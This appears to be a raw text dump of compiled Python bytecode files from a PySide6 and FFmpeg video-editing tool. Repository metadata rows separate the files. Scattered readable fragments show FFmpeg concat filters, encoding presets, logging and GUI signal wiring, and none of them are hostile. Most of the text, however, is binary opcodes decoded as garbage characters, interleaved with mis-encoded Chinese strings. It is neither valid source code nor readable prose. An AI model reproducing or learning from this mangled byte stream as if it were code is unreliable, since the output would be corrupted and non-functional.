z¦«dSr�©rFrrrur…rr) r rPr~ryrdr{r|r=r}s r Ú cut_videozFFmpeg.cut_videoÚsÀ€ğ    ”^ cÑ)¨J°q°r°r¬NÑ:ˆ ؘB˜Q˜B”< #Ñ%¨°°°¬ Ñ4ˆà Ø Ø �:Ø �8Ø Ø Ğ#�jĞ#Ğ#Ğ#Ø Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rúH-c:v libx264 -preset veryfast -crf 23 -c:a aac -b:a 192k -ar 44100 -ac 2có—tj|¦«D]ì}| d¦«r¾tj ||¦«}tj |¦«stj|¦«tj ||¦«} d|dd|›d�dd|›d�dd|›d�dd|d| ›d�g } | | ¦«tj |dz¦«ŒÕtj |dz¦«ŒídS) Nrirjrnroú-filter_complexa}"[0:v]fps=30,scale=1280:720,setsar=1[v0];[1:v]fps=30,scale=1280:720,setsar=1[v1];[2:v]fps=30,scale=1280:720,setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"õ视频å�ˆå¹¶å®Œæˆ�rq) rrrsrtrur*rvrwrFrr) r rxÚ input_file1Ú input_file2rzr{r|r}rPr~r=s r Úmerge_video_folderzFFmpeg.merge_video_folderòs-€å”J˜|Ñ,Ô,ğ @ğ @ˆDØ�}Š}˜VÑ$Ô$ğ @İœWŸ\š\¨,¸Ñ=Ô=� å”w—~’~ mÑ4Ô4ğ/İ”K  Ñ.Ô.Ğ.İ œgŸlšl¨=¸$Ñ?Ô?� ğ#ØØĞ,˜kĞ,Ğ,Ğ,ØĞ+˜jĞ+Ğ+Ğ+ØĞ,˜kĞ,Ğ,Ğ,Ø%ğTØØ&˜ Ğ&Ğ&Ğ&ğ (�ğ—’˜‘ ” � İ” ˜TĞ$8Ñ8Ñ9Ô9Ğ9Ğ9å” ˜TĞ$>Ñ>Ñ?Ô?Ğ?Ğ?ğ/ @ğ @rú 1920:1080Ú30c óş—d|dd|›d�dd|›d�dd|›d�dd|›d|›d|›d|›d|›d|›d � |d|›d�g } | | ¦«tj |¦«} t j| d z¦«dS) NrjrnrorŒú "[0:v]fps=ú,scale=ú,setsar=1[v0];[1:v]fps=z,setsar=1[v1];[2:v]fps=a,setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"rprˆ) r rPr~r�r�r{Ú resolutionÚfpsr|r=r}s r Ú merge_videozFFmpeg.merge_videos€ğ Ø Ø Ğ$�kĞ$Ğ$Ğ$Ø Ğ#�jĞ#Ğ#Ğ#Ø Ğ$�kĞ$Ğ$Ğ$Ø ğ b˜ğ bğ b Zğ bğ bÈğ bğ bĞT^ğ bğ bĞwzğ bğ bğDNğ bğ bğ bØ Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rcóæ—d|dd|›d�dd|›d�dd|›d|›d|›d|›d� |d|›d�g }| |¦«tj |¦«} t j| d z¦«dS) NrjrnrorŒr”r•r–zÏ,setsar=1[v1];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[v0][a0][v1][a1]concat=n=2:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"r�rˆ) r Úop_filer~Úed_filer{r—r˜r|r=r}s r Úmerge_video_twozFFmpeg.merge_video_two)sÆ€ğ Ø Ø �.�g�.�.�.Ø �.�g�.�.�.Ø ğ p˜ğ pğ p Zğ pğ pÈğ pğ pĞT^ğ pğ pğ pØ Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ,Ô,ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rú-acodec aac -b:a 128k có¼—d|dd|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou音频转ç �完æˆ�rˆ©r rPr~r{r|r=r}s r Ú audio_encodezFFmpeg.audio_encodeHóu€ğ Ø Ø Ø � Ğ Ğ Ğ Ø Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rú<-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128kcó¼—d|dd|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou视频转ç �完æˆ�rˆr s r Ú video_encodezFFmpeg.video_encodeZr¢rrc óÌ—d|dd|›d�d|›d|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnroz!-filter_complex "[0:v]setpts=PTS/z[v];[0:a]atempo=z[a]" -map "[v]" -map "[a]"u视频加速完æˆ�rˆ)r rPr~Úrater{r|r=r}s r Úaccelerated_encodezFFmpeg.accelerated_encodels‹€ğ Ø Ø Ø � Ğ Ğ Ğ Ø f°Ğ fĞ fÀdĞ fĞ fĞ fØ Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rc óÀ—d|dd|›d�|||d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou视频字幕混å�ˆå®Œæˆ�rˆ) r rPr~ÚaudioÚsubtitler{r|r=r}s r Ú avsmix_encodezFFmpeg.avsmix_encode€s{€ğ Ø Ø Ø � Ğ Ğ Ğ Ø Ø Ø Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ6Ñ6Ñ7Ô7Ğ7Ğ7Ğ7r)T)rfrg)rŠrg)rŠr‘r’rg)r�rg)r£rg)rr£rg)Ú__name__Ú __module__Ú __qualname__rrr rrrrrFrHrTrerr†r‰r�r™r�r¡r¥r¨r¬©rr rr sÚ€€€€€ğÔ&ØÔ(ØØğ !ğ !ğ !ğ !ğ#ğ#ğ#ğ#ğğğğ 7ğ 7ğ 7ğ 43ğ43ğ43ğn&ğ&ğ&ğğğğ0ğğğ.&Øğ #@ğ#@ğ#@ğ#@ğV&Øğ 2ğ2ğ2ğ2ğD&Øğ 2ğ2ğ2ğ2ğ0@ğ@ğ@ğ@ğB[ØØ Øğ2ğ2ğ2ğ2ğ>[ØØ Øğ2ğ2ğ2ğ2ğD,Øğ 2ğ2ğ2ğ2ğ*RØğ 2ğ2ğ2ğ2ğ*ØQØğ 2ğ2ğ2ğ2ğ2RØğ 8ğ8ğ8ğ8ğ8ğ8rr)r+rrrrr/Úmodules.configrrr°rr ú<module>r²sˆğğĞĞĞØ € € € Ø€€€Ø € € € ØĞĞĞà!Ğ!Ğ!Ğ!Ğ!Ğ!ğG8ğG8ğG8ğG8ğG8ñG8ôG8ğG8ğG8ğG8r
17,152
Python
.py
68
251.014706
1,242
0.322212
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,464
__init__.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/__init__.cpython-311.pyc
§ bV?fgãó&—ddlTddlTddlTddlZdS)é)Ú*N)ÚPySide6.QtCoreÚ PySide6.QtGuiÚPySide6.QtWidgetsÚos©óõEQ:\Git\FFmpeg-python\code-version-pre2.0-é‡�æ�„UI\modules\__init__.pyú<module>r s6ğØĞĞĞØĞĞĞØĞĞĞØ € € € € € r
313
Python
.py
2
155
309
0.483974
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,465
venco_Interface.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/venco_Interface.cpython-311.pyc
§ [@f¸Pãó<—ddlZddlZddlmZmZmZmZddlmZm Z m Z ddl m Z m Z mZddlmZddlmZddlmZddlmZejd ej›�¦«ejd ej›�¦«Gd „d e¦«ZGd „de¦«ZGd„de e¦«ZdS)éN)ÚQtÚQThreadÚSignalÚQObject)ÚQPixmapÚQPainterÚQColor)ÚQWidgetÚ QFileDialogÚ QMessageBox)Ú MessageBox)Úffpath)ÚFFmpeg)ÚUi_Formuåˆ�始化ffmpeg路径为:uåˆ�始化ffprobe路径为:cóP‡—eZdZe¦«Zˆfd„Zd„Zdd„Zdd„Zdd„Z ˆxZ S)ÚWorkerc󀕗t¦« ¦«||_||_||_||_dS©N)ÚsuperÚ__init__Ú task_typeÚ ffmpeg_pathÚ ffprobe_pathÚ task_args)ÚselfrrrrÚ __class__s €õPq:\Git\FFmpeg-python\code-version-pre2.1-批é‡�å�˜é€Ÿ\modules\venco_Interface.pyrzWorker.__init__s;ø€İ ‰Œ×ÒÑÔĞØ"ˆŒØ&ˆÔØ(ˆÔØ"ˆŒˆˆócóØ—|jdkr|j|j�n5|jdkr|j|j�n|jdkr|j|j�|j ¦«dS)NÚ extract_videoÚ audio_encodeÚ video_encode)rr rr!r"ÚfinishedÚemit©rs rÚrun_ffmpeg_taskzWorker.run_ffmpeg_tasks€Ø Œ>˜_Ò ,Ğ ,Ø ˆDÔ  ¤Ğ /Ğ /Ğ /Ø Œ^˜~Ò -Ğ -Ø ˆDÔ ˜tœ~Ğ .Ğ .Ğ .Ø Œ^˜~Ò -Ğ -Ø ˆDÔ ˜tœ~Ğ .Ğ .Ø Œ ×ÒÑÔĞĞĞrú-ycób—t|j¦«}| ||||||¦«dSr)rrÚextract_video_single)rÚ input_folderÚ output_folderÚ start_timeÚend_timeÚencoderÚ overwriteÚffmpeg_instances rr zWorker.extract_video&s9€İ  Ô!1Ñ2Ô2ˆØ×,Ò,¨\¸=È*ĞV^Ğ`gĞirÑsÔsĞsĞsĞsrcó^—t|j¦«}| ||||¦«dSr)rrr!©rÚ input_fileÚ output_filer.r/r0s rr!zWorker.audio_encode)ó2€İ  Ô!1Ñ2Ô2ˆØ×$Ò$ Z°¸gÀyÑQÔQĞQĞQĞQrcó^—t|j¦«}| ||||¦«dSr)rrr"r2s rr"zWorker.video_encode,r5r)r') Ú__name__Ú __module__Ú __qualname__rr#rr&r r!r"Ú __classcell__©rs@rrrs�ø€€€€€Øˆv‰xŒx€Hğ#ğ#ğ#ğ#ğ#ğ ğğğtğtğtğtğRğRğRğRğRğRğRğRğRğRğRğRrrcó$‡—eZdZˆfd„Zd„ZˆxZS)Ú WorkerThreadcóV•—t¦« ¦«||_dSr)rrÚworker)rr?rs €rrzWorkerThread.__init__2s$ø€İ ‰Œ×ÒÑÔĞØˆŒ ˆ ˆ rcó8—|j ¦«dSr)r?r&r%s rÚrunzWorkerThread.run6s€Ø Œ ×#Ò#Ñ%Ô%Ğ%Ğ%Ğ%r)r7r8r9rrAr:r;s@rr=r=1sGø€€€€€ğğğğğğ&ğ&ğ&ğ&ğ&ğ&ğ&rr=c󪇗eZdZdˆfd„ Zd„Zd„Zd„Zd„Zd„Zd„Z d „Z d „Z d „Z d „Z d „Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„ZˆxZS)ÚVencoInterfaceNcó•—t¦« |¬¦«| |¦«| ¦«| ¦«| ¦«| ¦«dS)N©Úparent)rrÚsetupUiÚinit_variablesÚ init_actionÚ init_printÚbind)rrFrs €rrzVencoInterface.__init__:suø€İ ‰Œ×Ò ĞÑ'Ô'Ğ'Ø � Š �TÑÔĞØ ×ÒÑÔĞØ ×ÒÑÔĞØ �ŠÑÔĞØ � Š ‰ Œ ˆ ˆ ˆ rcó"—|›|›|›|›|›|›�}|Sr©)rÚvcodecÚvpresetÚ resolutionÚfpsÚacodecÚapresetÚcustom_encoders rÚchange_custom_encoderz$VencoInterface.change_custom_encoderCs,€Ø"ĞO GĞO¨ZĞO¸ĞO¸fĞOÀgĞOĞOˆØĞrcó¼—d|_d|_d|_d|_d|_d|_d|_d|_d|_d|_ d|_ d|_ d|_ dS)NÚz-vcodec libx264 z-preset medium -crf 23 z -acodec aac z -b:a 128k Ú800000Ú23) Úinput_file_pathÚoutput_file_pathÚaudio_file_pathÚsubtitle_file_pathrTrNrOrPrQrRrSÚbitrateÚqualityr%s rrHzVencoInterface.init_variablesJsf€à!ˆÔØ "ˆÔØ!ˆÔØ"$ˆÔà ˆÔØ(ˆŒ Ø/ˆŒ ؈ŒØˆŒØ$ˆŒ Ø"ˆŒ ؈Œ ؈Œ ˆ ˆ rcó¢—|j d¦«|j d¦«|j d¦«dS)NTF)ÚlineEditÚ setReadOnlyÚ lineEdit_2Ú comboBox_5Ú setEnabledr%s rrIzVencoInterface.init_action[sJ€Ø Œ ×!Ò! $Ñ'Ô'Ğ'Ø Œ×#Ò# DÑ)Ô)Ğ)Ø Œ×"Ò" 5Ñ)Ô)Ğ)Ğ)Ğ)rcóº—|j d¦«| |j|j|j|j|j|j¦«|_ |j   |j ¦«tj  tj¦«r)tj  tj¦«s0|j d¦«t%jd¦«dS|j dtj›�¦«|j dtj›�¦«t%jd¦«dS)Nu.欢è¿�使用FFmpeg-python视频处ç�†å·¥å…·ï¼�u1ffmpeg路径或ffprobe路径错误,请检查ï¼�z/ffmpeg or ffprobe error, please check the path!uffmpegåˆ�始化:uffprobeåˆ�始化:z,ffmpeg and ffprobe initialized successfully!)ÚconsoleÚappendPlainTextrUrNrOrPrQrRrSrTÚ plainTextEditÚ setPlainTextÚosÚpathÚisfilerrrÚloggingÚerrorÚinfor%s rrJzVencoInterface.init_print`s1€à Œ ×$Ò$Ğ%UÑVÔVĞVà"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<å”—’�vÔ1Ñ2Ô2ğ Jµr´w·~²~ÅfÔFYÑ7ZÔ7Zğ JØ ŒL× (Ò (Ğ)\Ñ ]Ô ]Ğ ]İ ŒMĞKÑ LÔ LĞ LĞ LĞ Là ŒL× (Ò (Ğ)R½fÔ>PĞ)RĞ)RÑ SÔ SĞ SØ ŒL× (Ò (Ğ)T½vÔ?RĞ)TĞ)TÑ UÔ UĞ Uİ ŒLĞHÑ IÔ IĞ IĞ IĞ IrcóΗ|jj |j¦«|jj |j¦«|jj |j¦«|jj |j ¦«|j j |j ¦«|j j  |j¦«|jj  |j¦«|jj  |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j ¦«|j!j |j"¦«|j#j$ |j%¦«|j&j$ |j'¦«dSr)(Ú fileBtn_1ÚclickedÚconnectÚ open_file_1Ú fileBtn_2Ú open_file_2Ú fileBtn_3Ú open_file_3Ú fileBtn_4Ú open_file_4ÚpushBtnÚencodingÚ checkBox_2Ú stateChangedÚenable_resolutionÚ checkBox_3Ú enable_fpsÚcheckBoxÚenable_profileÚcomboBoxÚcurrentTextChangedÚ change_vcodecÚ comboBox_2Úchange_vpresetÚ comboBox_4Ú change_acodecÚ comboBox_3Úchange_apresetrdÚchange_profileÚspinBoxÚ valueChangedÚchange_bitrateÚ spinBox_2Úchange_qualityraÚ textChangedÚchange_resolutionrcÚ change_fpsr%s rrKzVencoInterface.bindosç€à ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø Œ Ô×$Ò$ T¤]Ñ3Ô3Ğ3ğ ŒÔ$×,Ò,¨TÔ-CÑDÔDĞDØ ŒÔ$×,Ò,¨T¬_Ñ=Ô=Ğ=Ø Œ Ô"×*Ò*¨4Ô+>Ñ?Ô?Ğ?ğ Œ Ô(×0Ò0°Ô1CÑDÔDĞDØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ ŒÔ*×2Ò2°4Ô3EÑFÔFĞFØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ Œ Ô!×)Ò)¨$Ô*=Ñ>Ô>Ğ>Ø ŒÔ#×+Ò+¨DÔ,?Ñ@Ô@Ğ@ğ Œ Ô!×)Ò)¨$Ô*@ÑAÔAĞAØ ŒÔ#×+Ò+¨D¬OÑ<Ô<Ğ<Ğ<Ğ<rcó”—tj|ddd¦«\|_}|jr!|j |j¦«dSdS)Nu选择输入文件rWõ视频文件 (*))r ÚgetOpenFileNamerZÚ lineEdit1ÚsetText©rÚ_s rruzVencoInterface.open_file_1ŒsW€İ"-Ô"=¸dĞDXĞZ\Ğ^pÑ"qÔ"qшԘaØ Ô ğ 9Ø ŒN× "Ò " 4Ô#7Ñ 8Ô 8Ğ 8Ğ 8Ğ 8ğ 9ğ 9rcó`—|j ¦«dkr@tj|d|j›d¦«\}}|r|j |¦«dSdStdd|¬¦«}| ¦«rtj d¦«dStj d¦«dS) NrWõ选择输出文件r˜õ警告õ请先选择输入文件ï¼�rEõ确认,关闭警告窗å�£õå�–消,关闭警告窗å�£) ršÚtextr ÚgetSaveFileNamerZÚ lineEdit2r›r Úexecrnrp)rr[r�Úws rrwzVencoInterface.open_file_2’sÎ€Ø Œ>× Ò Ñ Ô  BÒ &Ğ &İ"-Ô"=¸dĞDXĞ]aÔ]qĞZsğvHñ#Iô#IÑ Ğ ˜aØğ 9Ø”×&Ò&Ğ'7Ñ8Ô8Ğ8Ğ8Ğ8ğ 9ğ 9õ˜8Ğ%BÈ4ĞPÑPÔPˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9rcó”—tj|ddd¦«\|_}|jr!|j |j¦«dSdS)Nu选择音频文件rWõG音频文件 (*.aac *.flac *.mp3 *.m4a *.wav *.wma *.ogg *.opus *.alac))r r™r\Ú lineEdit3r›rœs rryzVencoInterface.open_file_3 sa€İ"-Ô"=¸dĞDXĞZ\ğ_hñ#iô#iшԘaØ Ô ğ 9Ø ŒN× "Ò " 4Ô#7Ñ 8Ô 8Ğ 8Ğ 8Ğ 8ğ 9ğ 9rcór—|j ¦«dkrItj|ddd¦«\|_}|jr!|j |j¦«dSdStdd|¬¦«}| ¦«rtj d¦«dStj d¦«dS) NrWu选择字幕文件u字幕文件 (*.srt *.ass)r r¡rEr¢r£) ršr¤r r™r]Ú lineEdit4r›r r§rnrp)rr�r¨s rr{zVencoInterface.open_file_4¦sÒ€Ø Œ>× Ò Ñ Ô  BÒ &Ğ &İ)4Ô)DÀTĞK_ĞacğfBñ*Cô*CÑ &ˆDÔ # QØÔ&ğ @Ø”×&Ò& tÔ'>Ñ?Ô?Ğ?Ğ?Ğ?ğ @ğ @õ˜8Ğ%BÈ4ĞPÑPÔPˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9rcóf—|j ¦«rš|j d¦«d|j ¦«›d�|_| |j|j|j|j |j |j ¦«|_ |j  |j ¦«dS|j d¦«d|_| |j|j|j|j |j |j ¦«|_ |j  |j ¦«dS)NFú-s ú TrW)r~Ú isCheckedrarbr¤rPrUrNrOrQrRrSrTrirjr%s rr€z VencoInterface.enable_resolution¶s0€Ø Œ?× $Ò $Ñ &Ô &ğ AØ ŒM× %Ò % eÑ ,Ô ,Ğ ,Ø; D¤M×$6Ò$6Ñ$8Ô$8Ğ;Ğ;Ğ;ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @à ŒM× %Ò % dÑ +Ô +Ğ +Ø ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @rcó8—|j ¦«r€d|j ¦«›d�|_| |j|j|j|j|j |j ¦«|_ |j   |j ¦«dSdS)Nr¯r°)r~r±rar¤rPrUrNrOrQrRrSrTrirjr%s rr•z VencoInterface.change_resolutionÂs§€Ø Œ?× $Ò $Ñ &Ô &ğ AØ; D¤M×$6Ò$6Ñ$8Ô$8Ğ;Ğ;Ğ;ˆDŒOØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @ğ Ağ Arcóf—|j ¦«rš|j d¦«d|j ¦«›d�|_| |j|j|j |j|j |j ¦«|_ |j  |j ¦«dS|j d¦«d|_| |j|j|j |j|j |j ¦«|_ |j  |j ¦«dS)NFú-r r°TrW)r�r±rcrbr¤rQrUrNrOrPrRrSrTrirjr%s rr‚zVencoInterface.enable_fpsÉs0€Ø Œ?× $Ò $Ñ &Ô &ğ AØ ŒO× 'Ò '¨Ñ .Ô .Ğ .Ø6˜Tœ_×1Ò1Ñ3Ô3Ğ6Ğ6Ğ6ˆDŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @à ŒO× 'Ò '¨Ñ -Ô -Ğ -؈DŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @rcó8—|j ¦«r€d|j ¦«›d�|_| |j|j|j|j|j |j ¦«|_ |j   |j ¦«dSdS)Nr´r°)r�r±rcr¤rQrUrNrOrPrRrSrTrirjr%s rr–zVencoInterface.change_fpsÕs§€Ø Œ?× $Ò $Ñ &Ô &ğ AØ6˜Tœ_×1Ò1Ñ3Ô3Ğ6Ğ6Ğ6ˆDŒHØ"&×"<Ò"<¸T¼[È$Ì,ĞX\ÔXgĞimÔiqĞswÔs~ğAEôAMñ#Nô#NˆDÔ Ø Ô × +Ò +¨DÔ,?Ñ @Ô @Ğ @Ğ @Ğ @ğ Ağ ArcóZ—|j ¦«dks#d|j ¦«›d�|_nd|_d|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)NÚcopyz-vcodec r°z -vcodec copy rW) r…Ú currentTextrNrOrUrPrQrRrSrTrirjr%s rr‡zVencoInterface.change_vcodecÛs­€ØŒ}×(Ò(Ñ*Ô*¨fÒ4Ğ4ØC T¤]×%>Ò%>Ñ%@Ô%@ĞCĞCĞCˆDŒKˆKà)ˆDŒK؈DŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó�—|j ¦«|_|j ¦«dz|_|j ¦«dks:|j ¦«dks|j ¦«dkr| |j¦«dS| |j¦«dS)NéèõCRFå“�è´¨-mediumõCRFå“�è´¨-fastõCQP硬编å“�è´¨(*qsv))r’Úvaluer_r�r^rˆr¸Úchange_vpreset_subr%s rr‰zVencoInterface.change_vpresetäs׀ؔ~×+Ò+Ñ-Ô-ˆŒ Ø”|×)Ò)Ñ+Ô+¨dÑ2ˆŒ Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >À$Ä/×B]ÒB]ÑB_ÔB_ĞcsÒBsĞBsĞw{ôxG÷xSòxSñxUôxUğYpòxpğxpØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1à × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1rcóV—|j ¦«dkr d|›d�|_n£|j ¦«dkr d|›d�|_nz|j ¦«dkr d|›d�|_nQ|j ¦«dkr d |›d�|_n(|j ¦«d kr d |›d�|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS) Nr»z-preset medium -crf r°r¼z-preset fast -crf õCBRå¹³å�‡ç �ç�‡-mediumz-preset medium -b:v õCBRå¹³å�‡ç �ç�‡-fastz-preset fast -b:v r½z-preset medium -qp ) rˆr¸rOrUrNrPrQrRrSrTrirj)rÚrates rr¿z!VencoInterface.change_vpreset_subìsH€Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >Ø9°$Ğ9Ğ9Ğ9ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.>Ò >Ğ >Ø7°Ğ7Ğ7Ğ7ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.FÒ FĞ FØ9°$Ğ9Ğ9Ğ9ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.DÒ DĞ DØ7°Ğ7Ğ7Ğ7ˆDŒLˆLØ Œ_× (Ò (Ñ *Ô *Ğ.EÒ EĞ EØ8°Ğ8Ğ8Ğ8ˆDŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcóô—|j ¦«dks|j ¦«dkr=|j ¦«dz|_| |j¦«dSdS)NrÁrÂrº)rˆr¸r�r¾r^r¿r%s rr‘zVencoInterface.change_bitrateúsu€Ø Œ?× &Ò &Ñ (Ô (Ğ,DÒ DĞ DÈÌ×HcÒHcÑHeÔHeĞiÒHĞHØœ<×-Ò-Ñ/Ô/°$Ñ6ˆDŒLØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1ğI@ĞHrcó(—|j ¦«dks:|j ¦«dks|j ¦«dkr:|j ¦«|_| |j¦«dSdS)Nr»r¼r½)rˆr¸r’r¾r_r¿r%s rr“zVencoInterface.change_qualityÿs¯€Ø Œ?× &Ò &Ñ (Ô (Ğ,>Ò >Ğ >À$Ä/×B]ÒB]ÑB_ÔB_ĞcsÒBsĞBsĞw{ôxG÷xSòxSñxUôxUğYpòxpğxpØœ>×/Ò/Ñ1Ô1ˆDŒLØ × #Ò # D¤LÑ 1Ô 1Ğ 1Ğ 1Ğ 1ğxpğxprcóZ—|j ¦«dks#d|j ¦«›d�|_nd|_d|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)Nr·z-acodec r°z -acodec copy rW) rŠr¸rRrSrUrNrOrPrQrTrirjr%s rr‹zVencoInterface.change_acodecs­€ØŒ×*Ò*Ñ,Ô,°Ò6Ğ6ØE T¤_×%@Ò%@Ñ%BÔ%BĞEĞEĞEˆDŒKˆKà)ˆDŒK؈DŒLØ"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó—d|j ¦«›d�|_| |j|j|j|j|j|j¦«|_ |j   |j ¦«dS)Nz-b:a r°) rŒr¸rSrUrNrOrPrQrRrTrirjr%s rr�zVencoInterface.change_apreset s„€Ø?˜tœ×:Ò:Ñ<Ô<Ğ?Ğ?Ğ?ˆŒ Ø"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<Ğ<Ğ<rcó.—|j ¦«ra|j d¦«|j ¦«dkr(d|_|j |j¦«dSdS|j d¦«dS)NTõ默认ú=-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k F)rƒr±rdrer¸rTrirjr%s rr„zVencoInterface.enable_profiles•€Ø Œ=× "Ò "Ñ $Ô $ğ .Ø ŒO× &Ò & tÑ ,Ô ,Ğ ,ØŒ×*Ò*Ñ,Ô,°Ò8Ğ8Ø&f�Ô#ØÔ"×/Ò/°Ô0CÑDÔDĞDĞDĞDğ9Ğ8ğ ŒO× &Ò & uÑ -Ô -Ğ -Ğ -Ğ -rcóü—|j ¦«r^|j ¦«rG|j ¦«dkr,d|_|j |j¦«dSdSdSdS)NrÉrÊ)rƒr±rdr†r¸rTrirjr%s rr�zVencoInterface.change_profiles�€Ø Œ=× "Ò "Ñ $Ô $ğ E¨¬×)KÒ)KÑ)MÔ)Mğ EØŒ×*Ò*Ñ,Ô,°Ò8Ğ8Ø&f�Ô#ØÔ"×/Ò/°Ô0CÑDÔDĞDĞDĞDğ Eğ Eğ Eğ EØ8Ğ8rc 󪇗‰j ¦«dk�s½‰j ¦«dk�sŸtj ‰j ¦«¦«�r‰j ¦«dk�rs‰j ¦«dk�rU‰j ¦«dk�rt‰j  ¦«dk�rV‰j   d¦«tdtjtj‰j ¦«‰j ¦«‰j ¦«¦«‰_t'‰j¦«‰_‰jj ˆfd„¦«‰jj ˆfd„¦«‰jj ‰jj¦«‰jj ‰jj¦«‰j ¦«dS‰j ¦«dkr‰j  ¦«dk�s†‰j   d¦«tdtjtj‰j ¦«‰j ¦«‰j ¦«‰j  ¦«‰j ¦«¦«‰_t'‰j¦«‰_‰jj ˆfd „¦«‰jj ˆfd „¦«‰jj 